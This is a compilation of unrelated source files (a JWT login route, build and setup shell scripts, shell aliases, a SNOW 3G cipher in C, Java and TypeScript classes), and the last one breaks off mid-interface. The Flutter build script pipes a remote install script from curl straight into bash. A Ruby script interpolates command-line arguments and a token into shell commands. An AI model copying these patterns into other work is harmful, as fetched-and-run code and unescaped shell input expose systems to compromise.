<filename>src/routes/login.js<gh_stars>0
const express = require('express')
const jwt = require('jsonwebtoken')
const { hasBodyParams } = require('../middleware/validation')
const checkExistingUser = require('../middleware/check-existing-user')
const validateAccess = require('../middleware/validate-access')
const router = express.Router()
module.exports = (db) => {
router.post(
'/',
hasBodyParams('device_id', 'app_name', 'access_key'),
validateAccess(db),
checkExistingUser(db),
(req, res) => {
const { device_id } = req.body
const { user_id } = req
const token = jwt.sign({ device_id }, process.env.AUTH_PRIVATE_KEY, { expiresIn: '30d' })
// TODO: checkin with Eugene on mobile app logout for ttl
// timestamp every login
db.query(
`
INSERT INTO login (user_id) VALUES ($1)
`,
[user_id],
)
.then(() => res.status(200).json({ token }))
.catch(err => res.status(500).json({ message: err.message }))
},
)
return router
}
|
<filename>tutos/specs/signup.js
import { goTo } from './helpers'

// Cavy UI spec for the signup flow. The single test is currently disabled
// (commented out); the scaffolding is kept so it can be re-enabled.
export default function(spec) {
  spec.beforeEach(function() {
    // This will run before each test in this spec file.
  });

  spec.describe('Signing up', function() {
    // spec.it('works', async function() {
    //   const navigation = await spec.findComponent('AppNavigation')
    //   // await spec.exists('Index');
    //   await goTo(navigation, 'signup');
    //   await spec.exists('SignUp');
    //   // await spec.fillIn('SignupScreen.Username', 'Cavy1');
    //   // await spec.fillIn('SignupScreen.FirstName', 'Cavy');
    //   // await spec.fillIn('SignupScreen.LastName', 'Test');
    //   // await spec.fillIn('SignupScreen.Email', '<EMAIL>');
    //   // await spec.fillIn('SignupScreen.Password', '<PASSWORD>');
    //   // await spec.fillIn('SignupScreen.PasswordConfirm', '<PASSWORD>');
    //   // await spec.press('SignupScreen.Button');
    //   // await spec.exists('Home');
    // });
  });
}
#!/bin/bash
#
# Copyright 2019 Delphix
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# shellcheck disable=SC2034
# Upstream git repository this package is built from.
DEFAULT_PACKAGE_GIT_URL="https://github.com/delphix/makedumpfile.git"
# Note: we get the package version programmatically in our build() hook
UPSTREAM_SOURCE_PACKAGE="makedumpfile"

# Install build dependencies listed in the package's debian control file.
function prepare() {
    logmust install_build_deps_from_control_file
}

# Build the .deb; derive PACKAGE_VERSION from the upstream Makefile's
# VERSION= line (prefixed with epoch "1:") unless it was provided.
function build() {
    logmust cd "$WORKDIR/repo"
    if [[ -z "$PACKAGE_VERSION" ]]; then
        logmust eval PACKAGE_VERSION="1:$(grep '^VERSION=' Makefile | cut -d "=" -f 2)"
    fi
    logmust dpkg_buildpackage_default
}

# Sync our repo from the upstream source package.
function update_upstream() {
    logmust update_upstream_from_source_package
}
|
const nodemailer = require('nodemailer');
// Bug fix: `cron` was used below but never required, so cron.schedule threw
// a ReferenceError at startup. node-cron is the scheduler that accepts the
// six-field (seconds-first) expression used here.
const cron = require('node-cron');

// Set up transporter
const transporter = nodemailer.createTransport({
  host: 'smtp.example.com',
  port: 587,
  auth: {
    user: 'user@example.com',
    pass: 'password'
  }
});

// Set up message
const message = {
  from: 'sender@example.com',
  to: 'recipient@example.com',
  subject: 'Daily Newsletter',
  text: 'This is a daily newsletter for subscribers!'
};

// Send message every day at 08:00:00.
const job = cron.schedule('00 00 08 * * *', () => {
  transporter.sendMail(message, (err, info) => {
    if (err) {
      console.error(err);
    } else {
      console.log(info);
    }
  });
});

// Start job
job.start();
#! /bin/bash
# Default build configuration; BUILD_MODE can be overridden with -m.
BUILD_MODE="debug"
# Device architectures (comma separated, passed to flutter --ios-arch).
ARCHS_ARM="arm64,armv7"
FLUTTER_ROOT=".flutter"
PRODUCT_DIR="product"
PRODUCT_ZIP="product.zip"
# Derived paths; recomputed again after option parsing at the bottom.
BUILD_PATH=".build_ios/${BUILD_MODE}"
PRODUCT_PATH="${BUILD_PATH}/${PRODUCT_DIR}"
PRODUCT_APP_PATH="${PRODUCT_PATH}/Flutter"
# git repository path
PRODUCT_GIT_DIR="/xx/xx/x"
# Print the command-line help text.
usage() {
    echo
    echo "build_ios.sh [-h | [-m <build_mode>] [-s]]"
    echo ""
    # Fixed help-text typos: "Build model" -> "Build mode" and
    # "<builde_model>" -> "<build_mode>".
    echo "-h - Help."
    echo "-m - Build mode, valid values are 'debug', 'profile', or 'release'. "
    echo "     Default values: 'debug'."
    echo ""
    echo "Build product in 'build_ios/<build_mode>/${PRODUCT_DIR}' directory."
    echo
}
# Print all arguments to stderr (error reporting helper).
EchoError() {
    echo "$@" 1>&2
}
# Fetch the Flutter dependencies via the flutter_wrapper shim, installing
# the wrapper first if it is not present in the working directory.
flutter_get_packages() {
    echo "================================="
    echo "Start get flutter app plugin"
    local flutter_wrapper="./flutterw"
    if [ -e $flutter_wrapper ]; then
        echo 'flutterw installed' >/dev/null
    else
        # Install flutter_wrapper from its upstream install script.
        bash -c "$(curl -fsSL https://raw.githubusercontent.com/passsy/flutter_wrapper/master/install.sh)"
        if [[ $? -ne 0 ]]; then
            EchoError "Failed to installed flutter_wrapper."
            exit -1
        fi
    fi
    ${flutter_wrapper} packages get --verbose
    if [[ $? -ne 0 ]]; then
        EchoError "Failed to install flutter plugins."
        exit -1
    fi
    echo "Finish get flutter app plugin"
}
# Build the Flutter app: AOT-compile for profile/release (or reuse the
# prebuilt debug App.framework), then assemble App.framework,
# Flutter.framework and flutter_assets into ${PRODUCT_APP_PATH} and patch
# the podspec so it vends both frameworks.
build_flutter_app() {
    echo "================================="
    echo "Start Build flutter app"
    echo "Build mode: ${BUILD_MODE}"
    mkdir -p -- "${PRODUCT_APP_PATH}"
    local target_path="lib/main.dart"
    # Engine artifact variant matching the requested build mode.
    local artifact_variant="unknown"
    case "$BUILD_MODE" in
        release*)
            artifact_variant="ios-release"
            ;;
        profile*)
            artifact_variant="ios-profile"
            ;;
        debug*)
            artifact_variant="ios"
            ;;
        *)
            EchoError "========================================================================"
            EchoError "ERROR: Unknown FLUTTER_BUILD_MODE: ${BUILD_MODE}."
            EchoError "Valid values are 'debug', 'profile', or 'release'."
            EchoError "This is controlled by the -m environment varaible."
            EchoError "========================================================================"
            exit -1
            ;;
    esac
    if [[ "${BUILD_MODE}" != "debug" ]]; then
        # AOT builds cannot target simulator architectures.
        if [[ $ARCHS_ARM =~ .*i386.* || $ARCHS_ARM =~ .*x86_64.* ]]; then
            EchoError "========================================================================"
            EchoError "ERROR: Flutter does not support running in profile or release mode on"
            EchoError "the Simulator (this build was: '$BUILD_MODE')."
            EchoError "mode by setting '-m debug'"
            EchoError "========================================================================"
            exit -1
        fi
        echo "Build archs: ${ARCHS_ARM}"
        # build fLutter app
        ${FLUTTER_ROOT}/bin/flutter --suppress-analytics \
            --verbose \
            build aot \
            --output-dir="${BUILD_PATH}" \
            --target-platform=ios \
            --target="${target_path}" \
            --${BUILD_MODE} \
            --ios-arch="${ARCHS_ARM}"
        if [[ $? -ne 0 ]]; then
            EchoError "Failed to build flutter app"
            exit -1
        fi
    else
        # Debug: reuse the prebuilt App.framework instead of AOT compiling.
        echo "Build archs: x86_64 ${ARCHS_ARM}"
        local app_framework_debug="iOSApp/Debug/App.framework"
        cp -r -- "${app_framework_debug}" "${BUILD_PATH}"
    fi
    app_plist_path=".ios/Flutter/AppFrameworkInfo.plist"
    cp -- "${app_plist_path}" "${BUILD_PATH}/App.framework/Info.plist"
    # copy flutter sdk
    local framework_path="${FLUTTER_ROOT}/bin/cache/artifacts/engine/${artifact_variant}"
    local flutter_framework="${framework_path}/Flutter.framework"
    local flutter_podspec="${framework_path}/Flutter.podspec"
    cp -r -- "${BUILD_PATH}/App.framework" "${PRODUCT_APP_PATH}"
    cp -r -- "${flutter_framework}" "${PRODUCT_APP_PATH}"
    cp -r -- "${flutter_podspec}" "${PRODUCT_APP_PATH}"
    # Non-debug bundles ship precompiled code; skip script snapshotting.
    local precompilation_flag=""
    if [[ "$BUILD_MODE" != "debug" ]]; then
        precompilation_flag="--precompiled"
    fi
    # build bundle
    ${FLUTTER_ROOT}/bin/flutter --suppress-analytics \
        --verbose \
        build bundle \
        --target-platform=ios \
        --target="${target_path}" \
        --${BUILD_MODE} \
        --depfile="${BUILD_PATH}/snapshot_blob.bin.d" \
        --asset-dir="${BUILD_PATH}/flutter_assets" \
        ${precompilation_flag}
    if [[ $? -ne 0 ]]; then
        EchoError "Failed to build flutter assets"
        exit -1
    fi
    cp -rf -- "${BUILD_PATH}/flutter_assets" "${PRODUCT_APP_PATH}/App.framework"
    # setting podspec
    # replace:
    #   'Flutter.framework'
    # to:
    #   'Flutter.framework', 'App.framework'
    sed -i '' -e $'s/\'Flutter.framework\'/\'Flutter.framework\', \'App.framework\'/g' ${PRODUCT_APP_PATH}/Flutter.podspec
    echo "Finish build flutter app"
}
# Copy FlutterPluginRegistrant plus every plugin's ios/ directory listed in
# the generated .flutter-plugins file into the product directory.
flutter_copy_packages() {
    echo "================================="
    echo "Start copy flutter app plugin"
    local flutter_plugin_registrant="FlutterPluginRegistrant"
    local flutter_plugin_registrant_path=".ios/Flutter/${flutter_plugin_registrant}"
    echo "copy 'flutter_plugin_registrant' from '${flutter_plugin_registrant_path}' to '${PRODUCT_PATH}/${flutter_plugin_registrant}'"
    cp -rf -- "${flutter_plugin_registrant_path}" "${PRODUCT_PATH}/${flutter_plugin_registrant}"
    local flutter_plugin=".flutter-plugins"
    if [ -e $flutter_plugin ]; then
        OLD_IFS="$IFS"
        IFS="="
        # Each line of .flutter-plugins is "<name>=<path>"; IFS="=" splits it.
        cat ${flutter_plugin} | while read plugin; do
            local plugin_info=($plugin)
            local plugin_name=${plugin_info[0]}
            local plugin_path=${plugin_info[1]}
            if [ -e ${plugin_path} ]; then
                local plugin_path_ios="${plugin_path}ios"
                if [ -e ${plugin_path_ios} ]; then
                    if [ -s ${plugin_path_ios} ]; then
                        # Bug fix: the original printed the literal text
                        # 'plugin_name' instead of expanding ${plugin_name}.
                        echo "copy plugin '${plugin_name}' from '${plugin_path_ios}' to '${PRODUCT_PATH}/${plugin_name}'"
                        cp -rf -- "${plugin_path_ios}" "${PRODUCT_PATH}/${plugin_name}"
                    fi
                fi
            fi
        done
        IFS="$OLD_IFS"
    fi
    echo "Finish copy flutter app plugin"
}
# Copy the built product into the release git repository, commit with the
# app version (from get_version.sh) and push.
upload_product() {
    echo "================================="
    echo "upload product"
    echo "${PRODUCT_PATH}"
    echo "${PRODUCT_GIT_DIR}"
    cp -r -f -- "${PRODUCT_PATH}/" "${PRODUCT_GIT_DIR}"
    local app_version=$(./get_version.sh)
    pushd ${PRODUCT_GIT_DIR}
    git add .
    git commit -m "Flutter product ${app_version}"
    git push
    popd
}
# Full pipeline: clean, fetch packages, build, copy plugins, and (release
# builds only) publish the product to the release repository.
start_build() {
    rm -rf ${BUILD_PATH}
    flutter_get_packages
    build_flutter_app
    flutter_copy_packages
    if [[ "${BUILD_MODE}" == "release" ]]; then
        upload_product
    fi
    echo ""
    echo "done!"
}
# Parse options. NOTE(review): -s is accepted by getopts but has no case
# handler — confirm whether it is intentionally a no-op.
show_help=0
while getopts "m:sh" arg; do
    case $arg in
        m)
            BUILD_MODE="$OPTARG"
            ;;
        h)
            show_help=1
            ;;
        ?)
            show_help=1
            ;;
    esac
done
if [ $show_help == 1 ]; then
    usage
    exit 0
fi
# Recompute the derived paths now that -m may have changed BUILD_MODE.
BUILD_PATH=".build_ios/${BUILD_MODE}"
PRODUCT_PATH="${BUILD_PATH}/${PRODUCT_DIR}"
PRODUCT_APP_PATH="${PRODUCT_PATH}/Flutter"
start_build
exit 0
#!/bin/sh
#
# Container entrypoint: start a virtual X display (:99) in the background
# for headless GUI work, then exec the wrapped command.
# Silence errors from Xvfb because we are starting it in non-privileged mode.
#
Xvfb :99 -screen 0 1280x1024x24 > /dev/null 2>&1 &
exec "$@"
|
#!/usr/bin/env bash
# Publish the bot-go image with ko; requires KO_DOCKER_REPO, defaults the
# tag to "latest".
set -e

if [ -z "$KO_DOCKER_REPO" ]
then
    echo "Please set \$KO_DOCKER_REPO."
    exit 1
fi

if [ -z "$IMAGE_TAG" ]
then
    echo "\$IMAGE_TAG is empty, setting to latest."
    IMAGE_TAG="latest"
fi

# Quote the tag so an unexpected value cannot word-split the command line.
ko publish -B -t "$IMAGE_TAG" --insecure-registry=true ./bot-go
# Bug fix: the original echoed $IMAGE, which is never defined anywhere in
# this script (it always printed a blank line); report the tag instead.
echo "$IMAGE_TAG"
#!/bin/bash
# (fixed typo: the original shebang read "#!/bin/basg", which makes the
# kernel fail to execute the script directly)
####################
# Author - Robert E. Novak aka REN
# sailnfool@gmail.com
# skype:sailnfool.ren
#_____________________________________________________________________
# Rev.|Auth.| Date | Notes
#_____________________________________________________________________
# 1.0 | REN |02/08/2022| testing nice2num
#_____________________________________________________________________
#
########################################################################
source func.nice2num
source func.errecho

TESTNAME="Test of function nice2num (func.nice2num) from\n\thttps://github.com/sailnfool/func"
USAGE="\r\n${0##*/} [-[hv]]\r\n
\t\tVerifies that the __kbytesvalue and __kbibytesvalue arrays have\r\n
\t\tcorrectly initialized.  Normally emits only PASS|FAIL message\r\n
\t-h\t\tPrint this message\r\n
\t-v\t\tVerbose mode to show values\r\n
"

optionargs="hv"
verbose_mode="FALSE"
failure="FALSE"

# Parse -h (help) and -v (verbose) options.
while getopts ${optionargs} name
do
	case ${name} in
	h)
		echo -e ${USAGE}
		exit 0
		;;
	v)
		verbose_mode="TRUE"
		;;
	\?)
		errecho "-e" "invalid option: -$OPTARG"
		errecho "-e" ${USAGE}
		exit 1
		;;
	esac
done

# Expected decimal (SI) suffix values, one "<suffix> <value>" pair per line.
kbtable="/tmp/kbyte_table_$$.txt"
cat > ${kbtable} <<EOF
B 1
K 1000
M 1000000
G 1000000000
T 1000000000000
P 1000000000000000
E 1000000000000000000
Z 1000000000000000000000
EOF

# Expected binary (IEC) suffix values.
kbibtable="/tmp/kbibyte_table_$$.txt"
cat > ${kbibtable} <<EOF2
BYT 1
KIB 1024
MIB 1048576
GIB 1073741824
TIB 1099511627776
PIB 1125899906842624
EIB 1152921504606846976
ZIB 1180591620717411303424
EOF2

# Check every SI suffix: nice2num "1<suffix>" must equal the table value.
while read -r suffix value
do
	if [[ "$(nice2num 1${suffix})" != "${value}" ]]
	then
		failure="TRUE"
	fi
	if [[ "${verbose_mode}" == "TRUE" ]]
	then
		echo -e "${suffix}\t$(nice2num 1${suffix})"
	fi
done < ${kbtable}

# Same check for the IEC suffixes.
while read -r suffix value
do
	if [[ "$(nice2num 1${suffix})" != "${value}" ]]
	then
		failure="TRUE"
	fi
	if [[ "${verbose_mode}" == "TRUE" ]]
	then
		echo -e "${suffix}\t$(nice2num 1${suffix})"
	fi
done < ${kbibtable}

# Previously forgot to cleanup
rm -f ${kbtable} ${kbibtable}

# Exit non-zero if any suffix conversion mismatched.
if [[ "${failure}" == "TRUE" ]]
then
	exit 1
else
	exit 0
fi
|
#!/bin/bash
# Open the web UI of the last host listed in the inventory file.
# Idiom fix: read the file with tail directly (no useless cat pipeline)
# and quote the URL so an odd address cannot word-split.
IP_ADDRESS=$(tail -n 1 inventory)
xdg-open "http://${IP_ADDRESS}:8080" >/dev/null
|
public static int sumOfNums(int maxNum){
int sum = 0;
for (int i=1; i <=maxNum; i++) {
sum += i;
}
return sum;
} |
# macOS-style clipboard helpers backed by xclip.
alias pbcopy='xclip -selection clipboard'
alias pbpaste='xclip -selection clipboard -o'
alias ls='ls --color=always'
alias ll='ls -lh'

# ----------------------
# Git Aliases
# ----------------------
alias ga='git add'
alias gaa='git add --all'
alias gau='git add --update'
alias gb='git branch'
alias gbd='git branch --delete'
alias gc='git commit'
alias gcm='git commit --message'
alias gcf='git commit --fixup'
alias gco='git checkout'
alias gcob='git checkout -b'
alias gcom='git checkout master'
alias gcos='git checkout staging'
alias gcod='git checkout develop'
alias gd='git diff'
alias gda='git diff HEAD'
alias gi='git init'
alias glg='git log --graph --oneline --decorate --all'
alias gld='git log --pretty=format:"%h %ad %s" --date=short --all'
alias gm='git merge --no-ff'
alias gma='git merge --abort'
alias gmc='git merge --continue'
alias gp='git pull'
alias gpr='git pull --rebase'
alias gps='git push'
alias gpo='git push -u origin master'
alias gr='git rebase'
alias gs='git status'
alias gss='git status --short'
alias gst='git stash'
alias gsta='git stash apply'
alias gstd='git stash drop'
alias gstl='git stash list'
alias gstp='git stash pop'
alias gsts='git stash save'
alias gsma='git submodule add'
alias gsmu='git submodule update --init --recursive'

# ----------------------
# Git Functions
# ----------------------
# Git log find by commit message
function glf() { git log --all --grep="$1"; }

# Reload the shell configuration (重载)
alias reload="source $HOME/.zshrc"
# Run a custom script from $zhiyuan/scripts, forwarding remaining args
# (自定义脚本).
zy() {
    local script="$zhiyuan/scripts/$1"
    if [[ -f $script ]]; then
        # Quote the path and args so scripts/arguments containing spaces
        # survive; "${@:2}" drops the script name itself.
        "$script" "${@:2}"
    else
        echo "$script not found"
    fi
}
# mkdir && cd
mk() {
    # Quote $1 (and guard with --) so directory names with spaces or a
    # leading dash work; the original unquoted form split on whitespace.
    mkdir -p -- "$1" && cd -- "$1"
}
# Prefer the interactive ncdu over plain du when it is installed.
if has_cmd ncdu; then alias du="ncdu"; fi

# Guard against accidental reboots: ask for confirmation first
# (vared is zsh's interactive variable editor).
reboot() {
    vared -p 'Reboot? [y/N]: ' -c _reboot
    [[ $_reboot == 'y' ]] && /sbin/reboot
}

# Run a command once, detached from the terminal, discarding all output.
one() {
    nohup "$@" >/dev/null 2>&1 &
}

# texdoc blocks the shell while the viewer is open; run it detached.
if has_cmd texdoc; then
    texdoc() {
        one texdoc "$@"
    }
fi

# Fuzzy-pick a note under ~/daily/note and open it in vim.
alias note='vim $HOME/daily/note/$(cd $HOME/daily/note && fzf)'
# vim helper: with no args, fuzzy-pick a file (repo-wide if inside a git
# repo); with a file/dir arg, open it or fuzzy-pick within it.
cvim() {
    if [[ $# -eq 0 ]]; then
        # Bug fix: the original used `git rev-parse --show-toplevel` bare as
        # the condition, which printed the repo path to the terminal before
        # vim started; silence stdout in the test.
        if git rev-parse --show-toplevel > /dev/null 2>&1; then
            dir=$(git rev-parse --show-toplevel)
            vim "$(cd "$dir" && fzf)"
        else
            vim "$(fzf)"
        fi
    elif [[ -f $1 ]]; then
        vim "$1"
    elif [[ -d $1 ]]; then
        vim "$(cd "$1" && fzf)"
    else
        vim "$@"
    fi
}
# Make a file executable ("chmode" shortcut).
alias chm='sudo chmod +x'
# go to root
zr() {
    # Bug fix: the bare rev-parse in the condition printed the repo path to
    # the terminal in addition to changing directory; silence stdout there.
    if git rev-parse --show-toplevel > /dev/null 2>&1; then
        cd "$(git rev-parse --show-toplevel)"
    fi
}
# Shallow-clone a GitHub repo via the fastgit mirror.
gcl() {
    git clone --depth 1 "https://hub.fastgit.org/$1"
}

# Archive HEAD into <name>.zip.
function gitzip() {
    # Bug fix: the original used an unquoted $@ ("$@.zip"), which breaks
    # with spaces and silently misbehaves when multiple args are given.
    git archive -o "$1.zip" HEAD
}
|
#!/usr/bin/env ruby
#
# Fetch the HA data and configures the ios and android builds according to the provided HA.
#
# Usage
#
# bin/set_ha <health-authority-label>
#
# Example
#
# bin/set_ha pc
#
# Requirements
#
# 1. Remote access to the environment repo
# 2. A github personal access token saved in `.env`:
# https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token
require 'open3'
require 'dotenv'
require_relative "./download_copy_methods"
require_relative "./download_links_methods"
require_relative "./download_brand_colors_methods"
require_relative "./fetch_configurable_images_methods"
Dotenv.load
HA_LABEL = ARGV[0]
ACCESS_TOKEN = ARGV[1] || ENV.fetch("ACCESS_TOKEN")

# Bug fix: an empty string is truthy in Ruby, so the original
# `if (ACCESS_TOKEN)` happily passed a blank token down to the fetch
# script. Reject nil AND blank values.
if ACCESS_TOKEN && !ACCESS_TOKEN.strip.empty? then
  fetching_env_succeeded = system("./bin/fetch_ha_env.sh #{HA_LABEL} #{ACCESS_TOKEN}")
else
  raise "Empty github access token"
end

# Download every HA-specific asset (images, copy, links, brand colors).
def download_all_assets
  system("./bin/download_assets.sh #{HA_LABEL} #{ACCESS_TOKEN}")
  download_copy_file(HA_LABEL, ACCESS_TOKEN)
  download_links_file(HA_LABEL, ACCESS_TOKEN)
  download_brand_colors_file(HA_LABEL, ACCESS_TOKEN)
  fetch_configurable_images(HA_LABEL, ACCESS_TOKEN)
  true
end

if fetching_env_succeeded && system("./bin/configure_builds.sh") &&
  download_all_assets
  exit 0
else
  exit 1
end
|
import java.util.Base64;
public class Main {
    /**
     * Demo: Base64-encode a fixed five-byte array and print the result.
     */
    public static void main(String[] args) {
        byte[] data = {1, 2, 3, 4, 5};
        Base64.Encoder encoder = Base64.getEncoder();
        String encodedData = encoder.encodeToString(data);
        // Prints AQIDBAU=
        System.out.println(encodedData);
    }
}
# Read four stick lengths and report whether some triple forms a proper
# triangle, a degenerate one (a straight segment), or neither.
sticks = sorted(int(tok) for tok in input().split(" "))
a, b, c, d = sticks
# With the lengths sorted, checking the two adjacent triples suffices.
has_triangle = a + b > c or b + c > d
has_segment = a + b == c or a + b == d or b + c == d
if has_triangle:
    print("TRIANGLE")
elif has_segment:
    print("SEGMENT")
else:
    print("IMPOSSIBLE")
|
<filename>src/interpreter/ast/Expression.java<gh_stars>0
package interpreter.ast;

/**
 * Created by Thomas on 2-3-2015.
 *
 * Base class for every expression node in the interpreter's AST; carries
 * only the source position handed to the {@code Node} superclass.
 */
public abstract class Expression extends Node {

    /**
     * @param lineIndex   line of the expression in the source text
     * @param columnIndex column of the expression in the source text
     */
    public Expression(int lineIndex, int columnIndex) {
        super(lineIndex, columnIndex);
    }
}
|
<filename>spec/models/qernel/slot_spec.rb
require 'spec_helper'

module Qernel
  # Specs for Slot.factory: the type argument selects the slot subclass.
  describe Slot do
    before :all do
      # Reset cached ETSource data so each run sees the fixture dataset.
      NastyCache.instance.expire!
      Etsource::Base.loader('spec/fixtures/etsource')
    end

    describe '.factory' do
      let(:node) { FactoryBot.build(:node) }

      context 'when type=nil' do
        it 'should be an ordinary slot' do
          slot = Qernel::Slot.factory(
            nil, 1, node,
            Qernel::Carrier.new(key: :electricity), :output)

          expect(slot).to be_a(Qernel::Slot)
          expect(slot).not_to be_a(Qernel::Slot::Elastic)
        end
      end

      context 'when type=invalid' do
        # Unrecognised types fall back to the plain Slot class.
        it 'should be an ordinary slot' do
          slot = Qernel::Slot.factory(:invalid,
            1, node, Qernel::Carrier.new(key: :loss), :input)

          expect(slot).to be_a(Qernel::Slot)
          expect(slot).not_to be_a(Qernel::Slot::Elastic)
        end
      end

      context 'when type=elastic' do
        it 'should be an elastic slot' do
          slot = Qernel::Slot.factory(:elastic,
            1, node, Qernel::Carrier.new(key: :loss), :output)

          expect(slot).to be_a(Qernel::Slot::Elastic)
        end
      end
    end
  end
end
|
<gh_stars>0
/*
* Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The OpenAirInterface Software Alliance licenses this file to You under
* the Apache License, Version 2.0 (the "License"); you may not use this file
* except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*-------------------------------------------------------------------------------
* For more information about the OpenAirInterface (OAI) Software Alliance:
* <EMAIL>
*/
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <nettle/nettle-meta.h>
#include <nettle/aes.h>
#include <nettle/ctr.h>
#include "assertions.h"
#include "conversions.h"
#include "secu_defs.h"
#include "snow3g.h"
#include "dynamic_memory_check.h"
/*
 * EEA1 (SNOW 3G based) NAS stream cipher: derives K and IV from the
 * stream_cipher context, generates a keystream, XORs it over the message
 * in place and copies the result to out.  Returns 0 on success.
 */
int
nas_stream_encrypt_eea1 (
  nas_stream_cipher_t * const stream_cipher,
  uint8_t * const out)
{
  snow_3g_context_t snow_3g_context;
  int n;
  int i = 0;
  uint32_t zero_bit = 0;
  //uint32_t byte_length;
  uint32_t *KS;
  uint32_t K[4],
    IV[4];

  DevAssert (stream_cipher != NULL);
  DevAssert (stream_cipher->key != NULL);
  DevAssert (stream_cipher->key_length == 16);
  DevAssert (out != NULL);
  /* Number of 32-bit keystream words needed to cover blength bits. */
  n = (stream_cipher->blength + 31) / 32;
  /* Count of significant bits in the final byte (0 = byte-aligned). */
  zero_bit = stream_cipher->blength & 0x7;
  //byte_length = stream_cipher->blength >> 3;
  memset (&snow_3g_context, 0, sizeof (snow_3g_context));
  /*
   * Initialisation
   */
  /*
   * Load the confidentiality key for SNOW 3G initialization as in section
   * 3.4.
   */
  memcpy (K + 3, stream_cipher->key + 0, 4); /*K[3] = key[0]; we assume
                                              * K[3]=key[0]||key[1]||...||key[31] , with key[0] the
                                              * * * * most important bit of key */
  memcpy (K + 2, stream_cipher->key + 4, 4); /*K[2] = key[1]; */
  memcpy (K + 1, stream_cipher->key + 8, 4); /*K[1] = key[2]; */
  memcpy (K + 0, stream_cipher->key + 12, 4); /*K[0] = key[3]; we assume
                                               * K[0]=key[96]||key[97]||...||key[127] , with key[127] the
                                               * * * * least important bit of key */
  K[3] = hton_int32 (K[3]);
  K[2] = hton_int32 (K[2]);
  K[1] = hton_int32 (K[1]);
  K[0] = hton_int32 (K[0]);
  /*
   * Prepare the initialization vector (IV) for SNOW 3G initialization as in
   * section 3.4.
   */
  IV[3] = stream_cipher->count;
  IV[2] = ((((uint32_t) stream_cipher->bearer) << 3) | ((((uint32_t) stream_cipher->direction) & 0x1) << 2)) << 24;
  IV[1] = IV[3];
  IV[0] = IV[2];
  /*
   * Run SNOW 3G algorithm to generate sequence of key stream bits KS
   */
  snow3g_initialize (K, IV, &snow_3g_context);
  /* NOTE(review): malloc return value is not checked before use. */
  KS = (uint32_t *) malloc (4 * n);
  snow3g_generate_key_stream (n, (uint32_t *) KS, &snow_3g_context);

  /* Mask unused trailing bits of the last keystream word.
   * NOTE(review): the shift uses (8 - zero_bit) on a 32-bit word — confirm
   * this matches the spec's intent for non-byte-aligned lengths. */
  if (zero_bit > 0) {
    KS[n - 1] = KS[n - 1] & (uint32_t) (0xFFFFFFFF << (8 - zero_bit));
  }

  for (i = 0; i < n; i++) {
    KS[i] = hton_int32 (KS[i]);
  }

  /*
   * Exclusive-OR the input data with keystream to generate the output bit
   * stream
   */
  for (i = 0; i < n * 4; i++) {
    stream_cipher->message[i] ^= *(((uint8_t *) KS) + i);
  }

  int ceil_index = 0;

  /* Clear the unused low bits of the final message byte. */
  if (zero_bit > 0) {
    ceil_index = (stream_cipher->blength + 7) >> 3;
    stream_cipher->message[ceil_index - 1] = stream_cipher->message[ceil_index - 1] & (uint8_t) (0xFF << (8 - zero_bit));
  }

  free_wrapper (KS);
  memcpy (out, stream_cipher->message, n * 4);

  if (zero_bit > 0) {
    out[ceil_index - 1] = stream_cipher->message[ceil_index - 1];
  }

  return 0;
}
|
<gh_stars>10-100
import { DateConverter } from '../date-converter.component';
import { Injectable } from '@nestjs/common';
import { LogInterface } from '../../persistence/interface/log.interface';
import { LogTypeInterface } from '../type/log-type.interface';
@Injectable()
export class LogModelToTypeMapper {
  constructor(private readonly dateConverter: DateConverter) {}

  /** Convert one persisted log document into its GraphQL type shape. */
  mapOne(log: LogInterface): LogTypeInterface {
    const mapped = {
      id: log._id.toString(),
      message: log.message,
      timestamp: this.dateConverter.convertDate(log.timestamp),
    };
    return mapped as LogTypeInterface;
  }

  /** Convert a list of log documents by delegating to mapOne. */
  mapMany(logs: LogInterface[]): LogTypeInterface[] {
    return logs.map((log: LogInterface): LogTypeInterface => this.mapOne(log));
  }
}
|
<filename>apps/evpnopenflow/src/main/java/org/onosproject/evpnopenflow/rsc/vpnport/VpnPortService.java<gh_stars>1-10
/*
* Copyright 2017-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.evpnopenflow.rsc.vpnport;
import com.fasterxml.jackson.databind.JsonNode;
import org.onosproject.evpnopenflow.rsc.VpnPort;
import org.onosproject.evpnopenflow.rsc.VpnPortId;
import java.util.Collection;
/**
* Service for interacting with the inventory of VPN port.
*/
/**
 * Service for interacting with the inventory of VPN ports.
 */
public interface VpnPortService {
    /**
     * Returns whether a vpnPort with the given identifier exists.
     *
     * @param vpnPortId vpnPort identifier
     * @return true if the vpnPort exists, false otherwise
     */
    boolean exists(VpnPortId vpnPortId);

    /**
     * Returns the vpnPort with the given identifier.
     *
     * @param vpnPortId vpnPort ID
     * @return VpnPort, or null if no port with the given ID is known
     */
    VpnPort getPort(VpnPortId vpnPortId);

    /**
     * Returns the collection of currently known vpnPorts.
     *
     * @return collection of VpnPort
     */
    Collection<VpnPort> getPorts();

    /**
     * Creates the given vpnPorts.
     *
     * @param vpnPorts the iterable collection of vpnPorts
     * @return true if all given vpnPorts were created successfully
     */
    boolean createPorts(Iterable<VpnPort> vpnPorts);

    /**
     * Updates the given vpnPorts.
     *
